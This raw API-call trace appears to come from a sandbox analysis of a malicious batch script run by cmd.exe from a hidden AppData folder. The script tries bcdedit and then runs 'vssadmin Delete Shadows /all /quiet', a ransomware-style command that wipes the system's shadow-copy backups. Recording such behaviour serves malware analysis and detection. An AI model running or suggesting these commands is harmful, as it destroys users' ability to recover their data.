FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\bcdedit.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0036.712] GetLastError () returned 0x2 [0036.712] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\bcdedit", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0036.713] GetLastError () returned 0x2 [0036.714] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0036.714] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\bcdedit.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0036.715] GetLastError () returned 0x2 [0036.715] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\bcdedit", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0036.716] GetLastError () returned 0x2 [0036.716] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0036.717] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x210) returned 0x3f6fb8 [0036.717] GetProcessHeap () returned 0x3e0000 [0036.717] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x7e) returned 0x3f71d0 [0036.717] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x418) returned 0x3f7258 [0036.717] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f7260, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0036.717] SetErrorMode (uMode=0x0) returned 0x1 [0036.717] GetProcessHeap () returned 0x3e0000 [0036.717] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7258, Size=0x64) returned 0x3f7258 [0036.717] GetProcessHeap () returned 0x3e0000 [0036.717] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7258) returned 0x64 [0036.717] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0036.717] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0036.717] GetProcessHeap () returned 0x3e0000 [0036.717] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f72c8 [0036.717] GetProcessHeap () returned 0x3e0000 [0036.717] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f73f0 [0036.717] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f73f0, Size=0x122) returned 0x3f73f0 [0036.717] GetProcessHeap () returned 0x3e0000 [0036.717] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f73f0) returned 0x122 [0036.717] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0036.717] GetProcessHeap () returned 0x3e0000 [0036.717] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7520 [0036.717] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7520, Size=0x76) returned 0x3f7520 [0036.717] GetProcessHeap () returned 0x3e0000 [0036.717] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7520) returned 0x76 [0036.717] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0036.717] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bcdedit.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0036.718] GetLastError () returned 0x2 [0036.718] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bcdedit", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0036.718] GetLastError () returned 0x2 [0036.718] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0036.718] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\bcdedit.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0036.718] GetLastError () returned 0x2 [0036.718] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\bcdedit", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0036.718] GetLastError () returned 0x2 [0036.718] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0036.718] FindFirstFileExW (in: lpFileName="C:\\Windows\\bcdedit.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0036.718] GetLastError () returned 0x2 [0036.718] FindFirstFileExW (in: lpFileName="C:\\Windows\\bcdedit", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0036.718] GetLastError () returned 0x2 [0036.719] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0036.719] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\bcdedit.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0036.720] GetLastError () returned 0x2 [0036.720] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\bcdedit", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0036.721] GetLastError () returned 0x2 [0036.721] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0036.721] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\bcdedit.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0036.723] GetLastError () returned 0x2 [0036.723] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\bcdedit", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0036.724] GetLastError () returned 0x2 [0036.724] _get_osfhandle (_FileHandle=2) returned 0x26c [0036.724] GetFileType (hFile=0x26c) returned 0x3 [0036.724] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2331, dwLanguageId=0x0, lpBuffer=0x4a994640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="'%1' is not recognized as an internal or external command,\r\noperable program or batch file.\r\n") returned 0x5d [0036.724] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2331, dwLanguageId=0x0, lpBuffer=0x4a994640, nSize=0x2000, Arguments=0x3beb80 | out: lpBuffer="'bcdedit' is not recognized as an internal or external command,\r\noperable program or batch file.\r\n") returned 0x62 [0036.724] _get_osfhandle (_FileHandle=2) returned 0x26c [0036.724] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="'bcdedit' is not recognized as an internal or external command,\r\noperable program or batch file.\r\n", cchWideChar=-1, lpMultiByteStr=0x4a986640, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="'bcdedit' is not recognized as an internal or external command,\r\noperable program or batch file.\r\n", lpUsedDefaultChar=0x0) returned 99 [0036.724] WriteFile (in: hFile=0x26c, lpBuffer=0x4a986640*, nNumberOfBytesToWrite=0x62, lpNumberOfBytesWritten=0x3beb58, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesWritten=0x3beb58*=0x62, lpOverlapped=0x0) returned 1 [0036.724] _get_osfhandle (_FileHandle=1) returned 0x264 [0036.724] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0036.725] _get_osfhandle (_FileHandle=1) returned 0x264 [0036.725] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0036.725] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0036.725] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0036.725] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0036.725] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0036.726] SetConsoleInputExeNameW () returned 0x1 [0036.726] GetConsoleOutputCP () returned 0x1b5 [0036.726] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0036.726] SetThreadUILanguage (LangId=0x0) returned 0x409 [0036.726] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0036.726] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0036.726] _get_osfhandle (_FileHandle=3) returned 0x78 [0036.726] SetFilePointer (in: hFile=0x78, lDistanceToMove=869, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x365 [0036.726] GetProcessHeap () returned 0x3e0000 [0036.726] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7520 | out: hHeap=0x3e0000) returned 1 [0036.726] GetProcessHeap () returned 0x3e0000 [0036.726] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f73f0 | out: hHeap=0x3e0000) returned 1 [0036.726] GetProcessHeap () returned 0x3e0000 [0036.726] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f72c8 | out: hHeap=0x3e0000) returned 1 [0036.726] GetProcessHeap () returned 0x3e0000 [0036.726] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7258 | out: hHeap=0x3e0000) returned 1 [0036.726] GetProcessHeap () returned 0x3e0000 [0036.726] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f71d0 | out: hHeap=0x3e0000) returned 1 [0036.726] GetProcessHeap () returned 0x3e0000 [0036.726] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6fb8 | out: hHeap=0x3e0000) returned 1 [0036.727] GetProcessHeap () returned 0x3e0000 [0036.727] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0036.727] GetProcessHeap () returned 0x3e0000 [0036.727] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0036.727] GetProcessHeap () returned 0x3e0000 [0036.727] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d60 | out: hHeap=0x3e0000) returned 1 [0036.727] GetProcessHeap () returned 0x3e0000 [0036.727] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0036.727] GetProcessHeap () returned 0x3e0000 [0036.727] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3ff0 | out: hHeap=0x3e0000) returned 1 [0036.727] GetProcessHeap () returned 0x3e0000 [0036.727] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3ef4b0 | out: hHeap=0x3e0000) returned 1 [0036.727] GetProcessHeap () returned 0x3e0000 [0036.727] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0036.727] _get_osfhandle (_FileHandle=3) returned 0x78 [0036.727] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x365 [0036.727] ReadFile (in: hFile=0x78, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x155c, lpOverlapped=0x0) returned 1 [0036.727] SetFilePointer (in: hFile=0x78, lDistanceToMove=906, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x38a [0036.727] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=37, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="vssadmin Delete Shadows /all /quiet\r\ncy ignoreallfailures\r\nnded\r\n") returned 37 [0036.727] _get_osfhandle (_FileHandle=3) returned 0x78 [0036.727] GetFileType (hFile=0x78) returned 0x1 [0036.727] _get_osfhandle (_FileHandle=3) returned 0x78 [0036.727] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x38a [0036.727] GetProcessHeap () returned 0x3e0000 [0036.727] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fbad8 [0036.727] GetProcessHeap () returned 0x3e0000 [0036.727] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fbad8 | out: hHeap=0x3e0000) returned 1 [0036.727] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x58) returned 0x3f3f90 [0036.727] GetProcessHeap () returned 0x3e0000 [0036.727] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x1a) returned 0x3f6158 [0036.728] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x40) returned 0x3f3ff0 [0036.728] _tell (_FileHandle=3) returned 906 [0036.728] _close (_FileHandle=3) returned 0 [0036.728] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18 [0036.728] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17 [0036.728] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18 [0036.728] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2 [0036.728] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19 [0036.728] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19 [0036.728] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19 [0036.728] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4 [0036.728] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4 [0036.728] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17 [0036.728] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3 [0036.728] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6 [0036.728] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18 [0036.728] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2 [0036.728] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6 [0036.728] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9 [0036.728] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9 [0036.728] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4 [0036.729] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4 [0036.729] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6 [0036.729] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15 [0036.729] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3 [0036.729] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19 [0036.729] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19 [0036.729] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14 [0036.729] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14 [0036.729] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4 [0036.729] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17 [0036.729] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3 [0036.729] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17 [0036.729] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2 [0036.729] _wcsicmp (_String1="vssadmin", _String2="START") returned 3 [0036.729] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18 [0036.729] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11 [0036.729] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9 [0036.729] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6 [0036.729] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6 [0036.729] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21 [0036.729] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16 [0036.729] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20 [0036.729] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19 [0036.729] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9 [0036.729] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x418) returned 0x3f6cf0 [0036.729] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0036.729] SetErrorMode (uMode=0x0) returned 0x1 [0036.729] GetProcessHeap () returned 0x3e0000 [0036.729] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x66) returned 0x3f6cf0 [0036.729] GetProcessHeap () returned 0x3e0000 [0036.729] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x66 [0036.729] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0036.730] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0036.730] GetProcessHeap () returned 0x3e0000 [0036.730] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6d60 [0036.730] GetProcessHeap () returned 0x3e0000 [0036.730] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6e88 [0036.730] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x122) returned 0x3f6e88 [0036.730] GetProcessHeap () returned 0x3e0000 [0036.730] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x122 [0036.730] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0036.730] GetProcessHeap () returned 0x3e0000 [0036.730] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0036.730] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0036.730] GetProcessHeap () returned 0x3e0000 [0036.730] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0036.730] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0036.730] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vssadmin.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0036.730] GetLastError () returned 0x2 [0036.730] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vssadmin", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0036.730] GetLastError () returned 0x2 [0036.730] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0036.730] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0036.730] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0036.731] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0036.731] GetLastError () returned 0x2 [0036.731] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0036.731] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0036.731] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0036.731] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0036.731] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0036.731] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x210) returned 0x3f6fb8 [0036.731] GetProcessHeap () returned 0x3e0000 [0036.731] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x52) returned 0x3f8278 [0036.731] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x418) returned 0x3f71d0 [0036.731] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f71d8, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0036.731] SetErrorMode (uMode=0x0) returned 0x1 [0036.731] GetProcessHeap () returned 0x3e0000 [0036.731] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f71d0, Size=0x66) returned 0x3f71d0 [0036.731] GetProcessHeap () returned 0x3e0000 [0036.731] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f71d0) returned 0x66 [0036.731] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0036.731] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0036.732] GetProcessHeap () returned 0x3e0000 [0036.732] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f7240 [0036.732] GetProcessHeap () returned 0x3e0000 [0036.732] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7368 [0036.732] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7368, Size=0x122) returned 0x3f7368 [0036.732] GetProcessHeap () returned 0x3e0000 [0036.732] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7368) returned 0x122 [0036.732] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0036.732] GetProcessHeap () returned 0x3e0000 [0036.732] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7498 [0036.732] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7498, Size=0x76) returned 0x3f7498 [0036.732] GetProcessHeap () returned 0x3e0000 [0036.732] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7498) returned 0x76 [0036.732] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0036.732] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vssadmin.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0036.732] GetLastError () returned 0x2 [0036.732] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vssadmin", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0036.732] GetLastError () returned 0x2 [0036.732] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0036.732] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f7518 [0036.732] FindClose (in: hFindFile=0x3f7518 | out: hFindFile=0x3f7518) returned 1 [0036.733] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0036.733] GetLastError () returned 0x2 [0036.733] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f7518 [0036.733] FindClose (in: hFindFile=0x3f7518 | out: hFindFile=0x3f7518) returned 1 [0036.733] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0036.733] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0036.733] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0036.733] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0036.733] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0036.733] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, 